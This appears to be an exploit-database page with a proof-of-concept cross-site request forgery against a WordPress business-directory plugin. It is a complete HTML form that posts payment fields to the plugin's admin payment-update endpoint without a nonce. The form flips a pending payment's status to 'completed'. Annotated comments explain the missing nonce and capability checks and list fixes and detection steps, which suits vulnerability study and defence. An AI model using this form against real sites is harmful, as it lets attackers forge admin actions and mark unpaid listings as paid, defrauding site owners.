## https://sploitus.com/exploit?id=WPEX-ID:C9911236-4AF3-4557-9BC0-217FACE534E1
Precondition: add a listing but do not complete the payment, so that its payment status stays pending.

<!--
  Proof-of-concept request: a plain HTML form that POSTs a full set of
  payment[...] fields to the payment_update view of the wpbdp_admin_payments
  admin page. example.com is a placeholder host.

  NOTE(review): none of the inputs below is a nonce or other anti-CSRF token.
  If the server accepts this request as shown, the payment_update handler is
  presumably not verifying a nonce; confirm against the plugin source.

  Defensive takeaways:
  - The handler should verify a WordPress nonce (check_admin_referer() or
    wp_verify_nonce()) and the caller's capability (current_user_can())
    before writing any payment field.
  - Site owners should update the plugin to the fixed release named in the
    vendor advisory (<FIXED_VERSION>, not stated on this page).
  - For detection, review access logs for POSTs to this endpoint whose
    Referer is not the site's own admin area, and reconcile payments marked
    completed against the payment gateway's transaction records.
-->
<form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=wpbdp_admin_payments&wpbdp-view=payment_update">
<table>
<tbody><tr><td>
payment[created_at_date]</td><td><input name="payment[created_at_date]" value="2021-03-31" size="100"></td></tr>
<tr><td>
payment[created_at_time_hour]</td><td><input name="payment[created_at_time_hour]" value="17" size="100"></td></tr>
<tr><td>
payment[created_at_time_min]</td><td><input name="payment[created_at_time_min]" value="49" size="100"></td></tr>
<!-- payment[id] presumably selects the payment record to update; 3 is the sample value used on this page. -->
<tr><td>
payment[id]</td><td><input name="payment[id]" value="3" size="100"></td></tr>
<tr><td>
payment[payer_data][address]</td><td><input name="payment[payer_data][address]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][address_2]</td><td><input name="payment[payer_data][address_2]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][city]</td><td><input name="payment[payer_data][city]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][country]</td><td><input name="payment[payer_data][country]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][state]</td><td><input name="payment[payer_data][state]" value="" size="100"></td></tr>
<tr><td>
payment[payer_data][zip]</td><td><input name="payment[payer_data][zip]" value="" size="100"></td></tr>
<tr><td>
payment[payer_email]</td><td><input name="payment[payer_email]" value="badguy@example.com" size="100"></td></tr>
<tr><td>
payment[payer_first_name]</td><td><input name="payment[payer_first_name]" value="" size="100"></td></tr>
<tr><td>
payment[payer_last_name]</td><td><input name="payment[payer_last_name]" value="" size="100"></td></tr>
<!--
  Security-relevant field: the page's precondition leaves the payment pending,
  and this input submits "completed" instead. A status change like this is the
  state transition the server must gate behind nonce and capability checks.
-->
<tr><td>
payment[status]</td><td><input name="payment[status]" value="completed" size="100"></td></tr>
<tr><td>
payment_note</td><td><input name="payment_note" value="" size="100"></td></tr>
</tbody></table>
<input id="submit" type="submit" value="Submit">
</form>